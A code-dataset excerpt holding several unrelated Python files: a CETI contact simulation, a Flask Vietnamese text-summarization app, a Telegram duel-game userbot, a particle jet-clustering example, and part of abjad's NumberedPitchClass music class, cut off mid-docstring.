CETIs[i][0][4])\n index.append(kcross)\n x.append(CETIs[i][0][2])\n y.append(CETIs[i][0][3])\n\n firstcontact = 1.e8\n\n for j in range(1, k): # traverse contacts\n\n earlier = CETIs[i][j][4] - CETIs[i][0][4]\n firstcontact = min(earlier, firstcontact)\n Dx = np.sqrt(((\n np.array(CETIs[i][0][2:4]) -\n np.array(CETIs[i][j][2:4]))**2).sum())\n\n waiting.append(earlier)\n distancias.append(Dx)\n hangon.append(CETIs[i][j][5] - CETIs[i][j][4])\n\n if k > 1:\n firstc.append(firstcontact)\n\n kcross += 1\n\n N = 12\n count = [0]*N\n for i in range(N):\n count[i] = inbox.count(i)\n\n return({\n # all CETIs\n 'A': awaken, # lifetime of the CETI\n 'inbox': inbox, # number of contact a single CETI makes\n 'index': index, # ID if the CETI in the simulation run\n 'x': x, # x position in the galaxy\n 'y': y, # y position in the galaxy\n #\n # all pairs of CETIs that make contact\n 'dist': distancias, # distance between communicating CETIs\n 'hangon': hangon, # duration of the contact\n 'w': waiting, # time elapsed from awakening to contact\n 'c1': firstc, # time of the first contact\n\n # all simulated points in the parameter space\n 'n': ncetis, # total number of CETIs in each simulated points\n #\n # chosen integer bins in multiplicity\n 'count': count}) # distribution of the multiplicity of contacts\n\n def redux_2d(self, show_progress=False):\n \"\"\"Reddux experiment to 2D matrices.\n\n Takes all the experiments in self.params and reduces the data\n to matrices containing:\n 1) fraction of nodes that make contact in (t_A, t_D)\n 2) fraction of nodes that make contact in t_A\n\n Parameters\n ----------\n show_progress : boolean\n Show if a progress indicator is shown\n\n Returns\n -------\n m1 : ndarray\n Matrix containing the fraction of nodes that make contact\n in (t_A,t_D) as a function of tau_awakening and tau_survive values\n\n m2 : ndarray\n Matrix containing the fraction of nodes that make contact\n in t_A as a function of tau_awakening and tau_survive values\n\n Notes\n -----\n To do: allow to compute any quantity.\n \"\"\"\n import pickle\n import numpy as np\n\n # parameters\n p = self.config.p\n\n A = self.params['tau_awakening']\n S = self.params['tau_survive']\n A = list(set(A))\n S = list(set(S))\n A.sort()\n S.sort()\n\n print(A)\n print(S)\n\n N1 = len(A)\n N2 = len(S)\n m1 = np.zeros((N1, N2))\n m2 = np.zeros((N1, N2))\n\n l0 = self.params['D_max'] == self.params['D_max'][0]\n\n toolbar_width = 40\n\n print(self.params.keys())\n\n for i, a in enumerate(A):\n if p.verbose:\n print(\"%2.2d/%2.2d\" % (i+1, N1))\n l1 = abs(self.params['tau_awakening']-a) < 1.e-5\n\n if show_progress:\n sys.stdout.write(\"[%s]\" % (\" \" * toolbar_width))\n sys.stdout.flush()\n sys.stdout.write(\"\\b\" * (toolbar_width+1))\n for j, s in enumerate(S):\n if show_progress:\n sys.stdout.write(\"-\")\n sys.stdout.flush()\n\n l2 = abs(self.params['tau_survive']-s) < 1.e-5\n\n cond = l0 & l1 & l2\n\n if len(cond) > 0:\n\n D = self.redux_1d(subset=cond)\n\n # awaken = D['A']\n inbox = D['inbox']\n # distancias = D['dist']\n # hangon = D['hangon']\n # waiting = D['w']\n # count = D['count']\n # index = D['index']\n firstc = D['c1']\n # ncetis = D['n']\n # x = D['x']\n # y = D['y']\n\n # m1 : fraction of nodes that make contact in (t_A, t_D)\n m1[i][j] = inbox.count(0)/max(len(inbox), 1)\n\n # m2 : fraction of nodes that make contact at t_A\n m2[i][j] = firstc.count(0.)/max(len(firstc), 1)\n else:\n m1[i][j] = 0.\n m2[i][j] = 0.\n\n if show_progress:\n sys.stdout.write(\"]\\n\") # this ends the progress bar\n\n m1 = np.transpose(m1)\n m2 = np.transpose(m2)\n\n fn = self.config.filenames\n fname = fn.dir_output + fn.exp_id\n fname1 = fname + '/m1.pk'\n fname2 = fname + '/m2.pk'\n\n print(fname1)\n print(fname2)\n\n pickle.dump(m1, open(fname1, 'wb'))\n pickle.dump(m2, open(fname2, 'wb'))\n\n return((m1, m2))\n\n def show_ccns(self, i, interactive=False):\n \"\"\"Show simulation results.\n\n Parameters\n ----------\n None\n \"\"\"\n filename = self.params.loc[i][3]\n try:\n CETIs = pickle.load(open(filename, \"rb\"))\n except EOFError:\n CETIs = []\n\n for i in range(len(CETIs)):\n print('%2d (%5.0f, %5.0f) yr <%5.0f, %5.0f> lyr' %\n (CETIs[i][0][1], CETIs[i][0][4],\n CETIs[i][0][5], CETIs[i][0][2], CETIs[i][0][3]))\n\n k = len(CETIs[i]) - 1\n for j in range(k):\n Dx = np.sqrt(((\n np.array(CETIs[i][0][2:4]) -\n np.array(CETIs[i][j+1][2:4]))**2).sum())\n\n print('%2d sees %2d (%5.0f, %5.0f) yr \\\n <%5.0f, %5.0f> lyr distance=%f' % (CETIs[i][j+1][0],\n CETIs[i][j+1][1],\n CETIs[i][j+1][4],\n CETIs[i][j+1][5],\n CETIs[i][j+1][2],\n CETIs[i][j+1][3], Dx))\n if interactive:\n return CETIs\n","repo_name":"mlares/hearsay","sub_path":"hearsay/hearsay.py","file_name":"hearsay.py","file_ext":"py","file_size_in_byte":48906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3782797241","text":"from flask import Flask, request\nfrom flask import json\nfrom flask.json import jsonify\nfrom flask.templating import render_template\nfrom flask_cors import CORS\nimport nltk\nfrom gensim.models import KeyedVectors\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin_min\nimport pickle\nfrom revolution_score import bert_score_compute, rouge_score_compute\nfrom pyvi import ViTokenizer\nimport numpy as np\nfrom summarizer import Summarizer\n\napp = Flask(__name__)\nCORS(app)\n\nDATA_DIR = './data/plaintext/'\nMANUAL_DIR = './data/manual_summary/'\n\nprint(\"Initialize Summarizer...\")\nmodel = Summarizer()\nprint(\"Done\")\n\nprint(\"Downloading punkt...\")\ntry:\n nltk.data.find('tokenizers/punkt')\n print('Existed')\nexcept LookupError:\n nltk.download('punkt')\n print(\"Downloaded\")\n\nvocab = None\nprint(\"Loading vocab...\")\ntry:\n vocab_file = open(\"vocab.pkl\", \"rb\")\n vocab = pickle.load(vocab_file)\n vocab_file.close()\nexcept Exception:\n w2v = KeyedVectors.load_word2vec_format('we_knn/wiki.vi.vec')\n vocab = w2v.key_to_index\n vocab_file = open(\"vocab.pkl\", \"wb\")\n pickle.dump(vocab, vocab_file)\n vocab_file.close()\nprint(\"Done\")\n\n\n@app.route('/')\ndef index():\n return render_template('base.html')\n\n\n@app.route('/score', methods=['GET'])\ndef score_get():\n return render_template('score.html')\n\n\n@app.route('/score', methods=['POST'])\ndef score_post():\n request_data = request.json\n plaintext_dir = DATA_DIR + str(request_data[\"plaintext_dir\"])\n manual_summary_dir = MANUAL_DIR + str(request_data[\"plaintext_dir\"])\n print(plaintext_dir, manual_summary_dir)\n modeling = str(request_data[\"model\"])\n method = str(request_data[\"method\"])\n\n file = open(plaintext_dir, 'r', encoding='utf8')\n plaintext = file.read()\n file.close()\n file = open(manual_summary_dir, 'r', encoding='utf8')\n manual_summary = file.read()\n file.close()\n\n m_s = process(manual_summary)\n processed = process(plaintext)\n\n sentences = nltk.sent_tokenize(m_s)\n\n nsum1 = len(sentences)\n print(nsum1, end=' ')\n summary = \"\"\n\n if modeling == 'bert':\n summary = ''.join(model(\n body=processed,\n ratio=float(nsum1),\n min_length=0,\n use_first=False\n ))\n summary = summary.replace('_', ' ')\n if modeling == 'word2vec':\n sentences = nltk.sent_tokenize(plaintext)\n X = []\n for sentence in sentences:\n sentence = ViTokenizer.tokenize(sentence)\n words = sentence.split(\" \")\n sentence_vec = np.zeros((300))\n for word in words:\n if word in vocab:\n sentence_vec += vocab[word]\n break\n X.append(sentence_vec)\n kmeans = KMeans(n_clusters=nsum1)\n kmeans.fit(X)\n\n avg = []\n for j in range(nsum1):\n idx = np.where(kmeans.labels_ == j)[0]\n avg.append(np.mean(idx))\n closest, _ = pairwise_distances_argmin_min(kmeans.cluster_centers_, X)\n ordering = sorted(range(nsum1), key=lambda k: avg[k])\n summary = ' '.join([sentences[closest[idx]] for idx in ordering])\n summary = summary.replace('...', '')\n print(len(summary.strip().split('. ')))\n p, r, f1 = 0, 0, 0\n\n print(m_s)\n print(summary)\n\n if method == 'bert':\n p, r, f1 = bert_score_compute(summary, manual_summary, 'vi')\n if method == 'rouge':\n p, r, f1 = rouge_score_compute(summary, manual_summary, 'l')\n\n resp = {\n \"model-summarized\": summary,\n \"manual-summarized\": m_s,\n \"paragraph\": plaintext,\n \"p\": p,\n \"r\": r,\n \"f1\": f1\n }\n return jsonify(resp)\n\n\n@app.route('/word2vec', methods=['GET'])\ndef knn_get():\n return render_template('knn.html')\n\n\n@app.route('/word2vec', methods=['POST'])\ndef knn_post():\n data = request.json\n body = process(str(data[\"body\"]))\n print(body)\n n_clusters = int(data[\"n_clusters\"])\n sentences = nltk.sent_tokenize(body)\n X = []\n for sentence in sentences:\n sentence = ViTokenizer.tokenize(sentence)\n words = sentence.split(\" \")\n sentence_vec = np.zeros((300))\n for word in words:\n if word in vocab:\n sentence_vec += vocab[word]\n break\n X.append(sentence_vec)\n kmeans = KMeans(n_clusters=n_clusters)\n kmeans.fit(X)\n\n avg = []\n for j in range(n_clusters):\n idx = np.where(kmeans.labels_ == j)[0]\n avg.append(np.mean(idx))\n closest, _ = pairwise_distances_argmin_min(kmeans.cluster_centers_, X)\n ordering = sorted(range(n_clusters), key=lambda k: avg[k])\n summary = ' '.join([sentences[closest[idx]] for idx in ordering])\n return jsonify({\"summarized\": ''.join(summary)})\n\n\n@app.route('/bert', methods=['GET'])\ndef bert_get():\n return render_template('bert.html')\n\n\n@app.route('/bert', methods=['POST'])\ndef bert_post():\n data = request.json\n ratio = float(data[\"ratio\"])\n min_length = int(data[\"min_length\"])\n body = str(data[\"body\"])\n paragraph = \"\"\n for line in body.splitlines():\n line = line.strip()\n if line != '' and line[-1:] != '.':\n line = line + '.'\n paragraph += line.strip()\n\n result = ''.join(model(\n paragraph,\n ratio,\n min_length=min_length\n ))\n result = result.replace('_', ' ')\n resp = {\n \"summarized\": result\n }\n return jsonify(resp)\n\n\ndef process(para: str):\n processed = ''\n for line in para.splitlines():\n line = line.strip()\n if line != '':\n if line[-1] != '.':\n line = line + '. '\n else:\n line = line + ' '\n processed += line\n return processed.strip()\n","repo_name":"dangnm9699/vietnamese-text-summarization","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38009883807","text":"import json\n\nfrom pyrogram import Client, filters\nfrom time import sleep\nfrom pyrogram.errors import FloodWait\n\napp = Client(\"farm_duel\")\n\n@app.on_message(filters.text & filters.command('help', prefixes='.'))\ndef Help(client, message):\n customer = app.get_messages(message.chat.id, reply_to_message_ids=message.message_id).from_user\n if customer.is_self:\n message.reply_text(f'Commands for all:\\n'\n f'твой инвентарь (ответом на мое сообщение)\\n'\n f'твой балланс (ответом на мое сообщение)\\n\\n'\n f'Commands for customers:\\n'\n f'Дуєль (Ответом на мое сообщение)\\n\\n'\n f'Commands for admins:'\n f'.admins'\n f'.customers'\n f'.reapeat [message]'\n f'.add [customer]'\n f'.remove [customer]')\n\n@app.on_message(filters.text & filters.command('admins', prefixes='.'))\ndef ShowAdmins(client, message):\n if message.from_user.is_self or str(message.from_user.id) in Admins:\n for admin in Admins:\n message.reply_text(f'{admin} - {Admins[admin]}', quote=False)\n\n@app.on_message(filters.text & filters.command('customers', prefixes='.'))\ndef ShowAdmins(client, message):\n if message.from_user.is_self or str(message.from_user.id) in Admins:\n for customer in Customers:\n message.reply_text(f'{customer} - {Customers[customer]}', quote=False)\n\n@app.on_message(filters.text & filters.command('repeat', prefixes='.'))\ndef Repeat(client, message):\n customer = app.get_messages(message.chat.id, reply_to_message_ids=message.message_id).from_user\n if customer.is_self and str(message.from_user.id) in Admins:\n message.reply_text(message.text.split(maxsplit=1)[1])\n\n@app.on_message(filters.reply & filters.command(\"add\", prefixes=\".\"))\ndef Add(client, message):\n customer = app.get_messages(message.chat.id, reply_to_message_ids=message.message_id).from_user\n if message.text.split()[1] == 'admin' and message.from_user.is_self:\n list = Admins\n filename = 'Admins'\n elif message.text.split()[1] == 'customer' and (message.from_user.is_self or str(message.from_user.id) in Admins):\n list = Customers\n filename = 'Customers'\n elif not message.from_user.is_self:\n message.reply_text('У вас нет прав!')\n\n\n if IsInList(str(customer.id), list):\n message.reply_text(f\"{customer.first_name} уже добавлен в {filename}!\")\n else:\n list[str(customer.id)] = customer.first_name\n message.reply_text(f\"{customer.first_name} добавлен в {filename}\")\n saveList(list, filename)\n\n@app.on_message(filters.command(\"remove\", prefixes=\".\"))\ndef Remove(client, message):\n try:\n customer_id = app.get_messages(message.chat.id, reply_to_message_ids=message.message_id).from_user.id\n except:\n customer_id = message.text.split()[1]\n\n if message.text.split()[1] == 'admin' and message.from_user.is_self:\n list = Admins\n filename = 'Admins'\n elif message.text.split()[1] == 'customer' and (message.from_user.is_self or str(message.from_user.id) in Admins):\n list = Customers\n filename = 'Customers'\n elif not message.from_user.is_self:\n message.reply_text('У вас нет прав!')\n\n if IsInList(str(customer_id), list):\n message.reply_text(f\"{list[str(customer_id)]} удален из {filename}!\")\n del list[str(customer_id)]\n saveList(list, filename)\n else:\n message.reply_text(f\"{list[str(customer_id)]} не находится в {filename}!\")\n\n@app.on_message(filters.text & filters.reply)\ndef Duel(client, message):\n if message.text.lower() == \"дуэль\":\n Oldmessage = app.get_messages(message.chat.id, reply_to_message_ids = message.message_id)\n if Oldmessage.from_user.is_self & IsInList(str(message.from_user.id), Customers):\n try:\n message.reply_text(\"Реанимировать жабу\", quote = False)\n sleep(0.1)\n message.reply_text(\"дуэль принять\", quote=True)\n sleep(0.2)\n message.reply_text(\"дуэль старт\", quote = False)\n except FloodWait as e:\n sleep(e.x)\n elif message.text.lower() == \"твой инвентарь\":\n message.reply_text(\"Мой инвентарь\")\n elif message.text.lower() == \"твой баланс\":\n message.reply_text(\"Мой баланс\")\n\ndef IsInList(id, list):\n IsInCustomer = False\n for item in list:\n if id == item:\n IsInCustomer = True\n return IsInCustomer\n\ndef saveList(myList, filename):\n filename += '.json'\n with open(filename, 'w') as f:\n # indent=2 is not needed but makes the file more\n # human-readable for more complicated data\n json.dump(myList, f, indent=2)\n print(\"Saved successfully!\")\n\ndef loadList(filename):\n filename += '.json'\n with open(filename, 'r') as f:\n return json.load(f)\n print(\"Load successfully!\")\n\nCustomers = loadList(\"Customers\")\nAdmins = loadList('Admins')\n\napp.run()\n","repo_name":"devID767/Farm_Duel_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42062177812","text":"import numpy as np\nimport math\nimport re\nimport os\nimport glob\nimport sys\nimport centauro \nimport subprocess\n\n# =============================================================================\n# Loading event information (particle momenta) ~ (p0,px,py,pz)\n# =============================================================================\n\noutput_folder = \"../output/example_jet_alg/\"\nmkdirCmd = [\"mkdir\", output_folder]\nsubprocess.run(mkdirCmd)\n\n\nR = 0.8\n\nin_file = open(\"../input/single_event_example.txt\",\"r\")\n\nevent = 0\nline = in_file.readline()\nclean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\nwhile (clean_line[0] == \"\"): \n event += 1\n particles = []\n line = in_file.readline()\n clean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\n while (clean_line[0] != \"\"):\n aline = clean_line.astype(np.float)\n particles.append(aline.tolist())\n line = in_file.readline()\n clean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\n \n n_particles = len(particles) \n \n\n jets = []\n inclusive_jets = []\n \n rec = 1\n for particle in particles:\n jets.append(centauro.jet([particle], rec, rec))\n \n inclusive_jets = centauro.centauro_clustering(jets, R)\n\n i = 0\n for jet_i in inclusive_jets:\n out_file = open(output_folder + \"jet_{0}.txt\".format( i ) ,\"w\")\n for cont_i in jet_i.constituents:\n vector = [[ centauro.eta(cont_i), centauro.phi(cont_i), centauro.theta(cont_i), cont_i[0] ]]\n np.savetxt(out_file, vector , delimiter = \"\\t\")\n i += 1\n out_file.close()\n \n\n line = in_file.readline()\n clean_line = np.array(re.sub(' +', ' ', line.strip()).split(\" \"))\n\nprint(\"{0} events loaded and analyzed.\".format(event))\n \nout_file.close()\n\n","repo_name":"YiannisMakris/centauro","sub_path":"python/example_jet_alg.py","file_name":"example_jet_alg.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30577577896","text":"# -*- coding: utf-8 -*-\nimport numbers\nfrom abjad.tools import mathtools\nfrom abjad.tools.pitchtools.PitchClass import PitchClass\n#Important comment from Greg on line 393\n\nclass NumberedPitchClass(PitchClass):\n '''Numbered pitch-class.\n\n ::\n\n >>> import abjad\n >>> import pytest\n\n .. container:: example\n\n Initializes from number of semitones:\n\n ::\n\n >>> abjad.NumberedPitchClass(13)\n NumberedPitchClass(1)\n\n .. container:: example\n\n Initializes from pitch name.\n\n ::\n\n >>> abjad.NumberedPitchClass('d')\n NumberedPitchClass(2)\n\n .. container:: example\n\n Initializes from named pitch.\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NamedPitch('g,'))\n NumberedPitchClass(7)\n\n .. container:: example\n\n Initializes from numbered pitch.\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NumberedPitch(15))\n NumberedPitchClass(3)\n\n .. container:: example\n\n Initializes from named pitch-class.\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NamedPitchClass('e'))\n NumberedPitchClass(4)\n\n .. container:: example\n\n Initializes from pitch-class / octave string:\n\n ::\n\n >>> abjad.NumberedPitchClass('C#5')\n NumberedPitchClass(1)\n\n .. container:: example\n\n Initializes from other numbered pitch-class:\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.NumberedPitchClass(9))\n NumberedPitchClass(9)\n\n .. container:: example\n\n Initializes from note:\n\n ::\n\n >>> abjad.NumberedPitchClass(abjad.Note(\"a'8.\"))\n NumberedPitchClass(9)\n\n '''\n\n ### CLASS VARIABLES ###\n\n __slots__ = (\n '_number',\n )\n\n ### INITIALIZER ###\n\n def __init__(self, number=0):\n from abjad.tools import pitchtools\n prototype = (numbers.Number, pitchtools.NumberedPitch, type(self))\n if isinstance(number, numbers.Number):\n self._initialize_by_number(float(number))\n elif isinstance(number, prototype):\n self._initialize_by_number(float(number.number))\n elif isinstance(number, pitchtools.NamedPitch):\n self._initialize_by_named_pitch(number)\n elif isinstance(number, pitchtools.NamedPitchClass):\n self._initialize_by_named_pitch_class(number)\n elif isinstance(number, str):\n self._initialize_by_string(number)\n elif pitchtools.Pitch._is_pitch_carrier(number):\n self._initialize_by_pitch_carrier(number)\n else:\n message = 'can not instantiate {} from {!r}.'\n message = message.format(type(self).__name__, number)\n raise TypeError(message)\n\n ### SPECIAL METHODS ###\n\n def __add__(self, argument):\n r'''Adds `argument` to numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> pitch_class = abjad.NumberedPitchClass(9)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(0)\n NumberedPitchClass(9)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(1)\n NumberedPitchClass(10)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(2)\n NumberedPitchClass(11)\n\n ::\n\n >>> pitch_class + abjad.NumberedInterval(3)\n NumberedPitchClass(0)\n\n Returns new numbered pitch-class.\n '''\n from abjad.tools import pitchtools\n interval = pitchtools.NumberedInterval(argument)\n return type(self)(self.number + interval.number % 12)\n\n def __copy__(self, *arguments):\n r'''Copies numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> import copy\n >>> pitch_class = abjad.NumberedPitchClass(9)\n >>> copy.copy(pitch_class)\n NumberedPitchClass(9)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(self)\n\n def __eq__(self, argument):\n r'''Is true when `argument` is a numbered pitch-class with pitch-class\n number equal to that of this numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> pitch_class_1 = abjad.NumberedPitchClass(0)\n >>> pitch_class_2 = abjad.NumberedPitchClass(0)\n >>> pitch_class_3 = abjad.NumberedPitchClass(1)\n\n ::\n\n >>> pitch_class_1 == pitch_class_1\n True\n >>> pitch_class_1 == pitch_class_2\n True\n >>> pitch_class_1 == pitch_class_3\n False\n\n ::\n\n >>> pitch_class_2 == pitch_class_1\n True\n >>> pitch_class_2 == pitch_class_2\n True\n >>> pitch_class_2 == pitch_class_3\n False\n\n ::\n\n >>> pitch_class_3 == pitch_class_1\n False\n >>> pitch_class_3 == pitch_class_2\n False\n >>> pitch_class_3 == pitch_class_3\n True\n\n Returns true or false.\n '''\n return super(NumberedPitchClass, self).__eq__(argument)\n\n def __format__(self, format_specification=''):\n r'''Formats numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> format(abjad.NumberedPitchClass(13))\n 'abjad.NumberedPitchClass(1)'\n\n Set `format_specification` to `''`, `'lilypond'` or `'storage'`.\n\n Returns string.\n '''\n superclass = super(NumberedPitchClass, self)\n return superclass.__format__(format_specification=format_specification)\n\n def __hash__(self):\n r'''Hashes numbered pitch-class.\n\n Required to be explicitly redefined on Python 3 if __eq__ changes.\n\n Returns integer.\n '''\n return super(NumberedPitchClass, self).__hash__()\n\n def __lt__(self, argument):\n r'''Is true when `argument` is a numbered pitch-class with a pitch\n number greater than that of this numberd pitch-class.\n\n .. container:: example\n\n Compares less than:\n\n ::\n\n >>> abjad.NumberedPitchClass(1) < abjad.NumberedPitchClass(2)\n True\n\n .. container:: example\n\n Does not compare less than:\n\n ::\n\n >>> abjad.NumberedPitchClass(2) < abjad.NumberedPitchClass(1)\n False\n\n Raises type error when `argument` is not a numbered pitch-class.\n '''\n if not isinstance(argument, type(self)):\n message = 'can not compare numbered pitch-class to {!r}.'\n message = message.format(argument)\n raise TypeError(message)\n return self.number < argument.number\n\n def __neg__(self):\n r'''Negates numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> pitch_class = abjad.NumberedPitchClass(9)\n >>> -pitch_class\n NumberedPitchClass(3)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(-self.number)\n\n def __radd__(self, argument):\n r'''Right-addition not defined on numbered pitch-classes.\n\n .. container:: example\n\n ::\n\n >>> statement = '1 + abjad.NumberedPitchClass(9)'\n >>> pytest.raises(NotImplementedError, statement)\n \n\n Raises not implemented error.\n '''\n message = 'right-addition not defined on {}.'\n message = message.format(type(self).__name__)\n raise NotImplementedError(message)\n\n def __str__(self):\n r'''Gets string representation of numbered pitch-class.\n\n Returns string.\n '''\n return str(self.number)\n\n def __sub__(self, argument):\n r'''Subtracts `argument` from numbered pitch-class.\n\n Subtraction is defined against both numbered intervals\n and against other pitch-classes.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedPitchClass(6)\n NumberedInversionEquivalentIntervalClass(0)\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedPitchClass(7)\n NumberedInversionEquivalentIntervalClass(1)\n\n ::\n\n >>> abjad.NumberedPitchClass(7) - abjad.NumberedPitchClass(6)\n NumberedInversionEquivalentIntervalClass(1)\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedInterval(-1)\n NumberedPitchClass(5)\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedInterval(0)\n NumberedPitchClass(6)\n\n ::\n\n >>> abjad.NumberedPitchClass(6) - abjad.NumberedInterval(1)\n NumberedPitchClass(5)\n\n Returns numbered inversion-equivalent interval-class.\n '''\n from abjad.tools import pitchtools\n if isinstance(argument, type(self)):\n interval_class_number = abs(\n self.number - argument.number\n )\n if 6 < interval_class_number:\n interval_class_number = 12 - interval_class_number\n return pitchtools.NumberedInversionEquivalentIntervalClass(\n interval_class_number)\n interval_class = pitchtools.NumberedInversionEquivalentIntervalClass(\n argument)\n return type(self)(self.number - interval_class.number % 12)\n\n ### PRIVATE METHODS ###\n\n def _apply_accidental(self, accidental=None):\n from abjad.tools import pitchtools\n accidental = pitchtools.Accidental(accidental)\n semitones = self.number + accidental.semitones\n return type(self)(semitones)\n\n def _get_diatonic_pitch_class_name(self):\n return self.name[0]\n\n def _get_diatonic_pitch_class_number(self):\n return self._diatonic_pitch_class_name_to_diatonic_pitch_class_number[\n self._get_diatonic_pitch_class_name()]\n\n def _get_format_specification(self):\n import abjad\n values = [self.number]\n return abjad.FormatSpecification(\n client=self,\n coerce_for_equality=True,\n storage_format_is_indented=False,\n storage_format_args_values=values,\n )\n\n def _initialize_by_named_pitch(self, argument):\n self._number = argument.pitch_class.number\n\n def _initialize_by_named_pitch_class(self, argument):\n self._number = argument.number\n\n#Greg wonders if this need to be changed to avoid rounding up?\n\n#Ivan: Changes below changes will allow 1/8 tones.\n# *will need rewriting to cope with 1/3 and 1/6 tones...\n def _initialize_by_number(self, argument):\n argument = round((float(argument) % 12) * 4) / 4\n div, mod = divmod(argument, 1)\n div %= 12\n self._number = div + mod\n\n def _initialize_by_pitch_carrier(self, argument):\n from abjad.tools import pitchtools\n named_pitch = pitchtools.NamedPitch.from_pitch_carrier(argument)\n self._initialize_by_named_pitch(named_pitch)\n\n def _initialize_by_string(self, argument):\n from abjad.tools import pitchtools\n named_pitch_class = pitchtools.NamedPitchClass(argument)\n self._initialize_by_named_pitch_class(named_pitch_class)\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def accidental(self):\n r'''Gets accidental.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(1).accidental\n Accidental('sharp')\n\n Returns accidental.\n '''\n import abjad\n return abjad.NamedPitch(self.number).accidental\n\n @property\n def name(self):\n r'''Gets name of numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(13).name\n 'cs'\n\n Returns string.\n '''\n from abjad import abjad_configuration\n accidental_spelling = abjad_configuration['accidental_spelling']\n if accidental_spelling == 'mixed':\n return self._pitch_class_number_to_pitch_class_name[self.number]\n elif accidental_spelling == 'sharps':\n return self._pitch_class_number_to_pitch_class_name_with_sharps[\n self.number]\n elif accidental_spelling == 'flats':\n return self._pitch_class_number_to_pitch_class_name_with_flats[\n self.number]\n else:\n message = 'unknown accidental spelling: {!r}.'\n message = message.format(accidental_spelling)\n raise ValueError(message)\n\n @property\n def number(self):\n r'''Gets number.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(1).number\n 1\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(13).number\n 1\n\n '''\n return self._number\n\n @property\n def pitch_class_label(self):\n r'''Gets pitch-class / octave label.\n\n .. container:: example\n\n ::\n\n >>> abjad.NumberedPitchClass(13).pitch_class_label\n 'C#'\n\n Returns string.\n '''\n return '{}{}'.format(\n self._get_diatonic_pitch_class_name().upper(),\n self.accidental.symbol,\n )\n\n ### PUBLIC METHODS ###\n\n def invert(self, axis=None):\n r'''Inverts numbered pitch-class.\n\n .. container:: example\n\n ::\n\n >>> for n in range(12):\n ... pitch_class = abjad.NumberedPitchClass(n)\n ... print(repr(pitch_class), repr(pitch_class.invert()))\n ...\n NumberedPitchClass(0) NumberedPitchClass(0)\n NumberedPitchClass(1) NumberedPitchClass(11)\n NumberedPitchClass(2) NumberedPitchClass(10)\n NumberedPitchClass(3) NumberedPitchClass(9)\n NumberedPitchClass(4) NumberedPitchClass(8)\n NumberedPitchClass(5) NumberedPitchClass(7)\n NumberedPitchClass(6) NumberedPitchClass(6)\n NumberedPitchClass(7) NumberedPitchClass(5)\n NumberedPitchClass(8) NumberedPitchClass(4)\n NumberedPitchClass(9) NumberedPitchClass(3)\n NumberedPitchClass(10) NumberedPitchClass(2)\n NumberedPitchClass(11) NumberedPitchClass(1)\n\n Interprets axis of inversion equal to pitch-class 0.\n\n Returns new numbered pitch-class.\n '''\n from abjad.tools import pitchtools\n axis = axis or pitchtools.NumberedPitch('c')\n axis = pitchtools.NumberedPitch(axis)\n this = pitchtools.NumberedPitch(self)\n interval = this - axis\n result = axis.transpose(interval)\n result = type(self)(result)\n return result\n\n def multiply(self, n=1):\n r'''Multiplies pitch-class number by `n`.\n\n .. container:: example\n\n ::\n\n >>> for n in range(12):\n ... pitch_class = abjad.NumberedPitchClass(n)\n ... print(repr(pitch_class), repr(pitch_class.multiply(5)))\n ...\n NumberedPitchClass(0) NumberedPitchClass(0)\n NumberedPitchClass(1) NumberedPitchClass(5)\n NumberedPitchClass(2) NumberedPitchClass(10)\n NumberedPitchClass(3) NumberedPitchClass(3)\n NumberedPitchClass(4) NumberedPitchClass(8)\n NumberedPitchClass(5) NumberedPitchClass(1)\n NumberedPitchClass(6) NumberedPitchClass(6)\n NumberedPitchClass(7) NumberedPitchClass(11)\n NumberedPitchClass(8) NumberedPitchClass(4)\n NumberedPitchClass(9) NumberedPitchClass(9)\n NumberedPitchClass(10) NumberedPitchClass(2)\n NumberedPitchClass(11) NumberedPitchClass(7)\n\n Returns new numbered pitch-class.\n '''\n return type(self)(n * self.number)\n\n def transpose(self, n=0):\n r'''Transposes numbered pitch-class by index `n`.\n\n .. container:: example\n\n ::\n\n >>> for n in range(12):\n ... pitch_class = abjad.NumberedPitchClass(n)\n ... print(repr(pitch_class), repr(pitch_class.transpose(-13)))\n ...\n NumberedPitchClass(0) NumberedPitchClass(11)\n NumberedPitchClass(1) NumberedPitchClass(0)\n NumberedPitchClass(2) NumberedPitchClass(1)\n NumberedPitchClass(3) NumberedPitchClass(2)\n NumberedPitchClass(4) NumberedPitchClass(3)\n NumberedPitchClass(5) 